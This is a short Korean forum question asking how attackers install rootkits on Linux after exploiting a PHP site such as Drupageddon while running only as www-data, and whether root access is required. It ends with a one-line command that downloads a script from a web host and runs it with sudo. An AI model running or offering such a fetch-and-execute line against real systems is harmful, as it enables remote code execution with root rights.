루트킷 검사에 대한 몇 가지 게시물을 보았지만 Linux 시스템에 어떻게 접근하는지에 대한 정보를 찾지 못했습니다. 특히 PHP 웹 사이트에서 버그를 악용하는 경우 ( 여기에서 drupageddon 에 대해 이야기하고 있습니다) 루트가 아닌 웹 서버 (www-data)로만 실행할 수 있지만 루트킷을 설치할 수 있습니다. 이것들이 어떻게 설치되는지에 관해 내가 찾은 아주 작은 정보는 그것들을 설치하기 위해 루트가되어야한다는 것을 암시합니다 ( 여기 참조 ).
wget http://mydomain/script.sh;sudo ./script.sh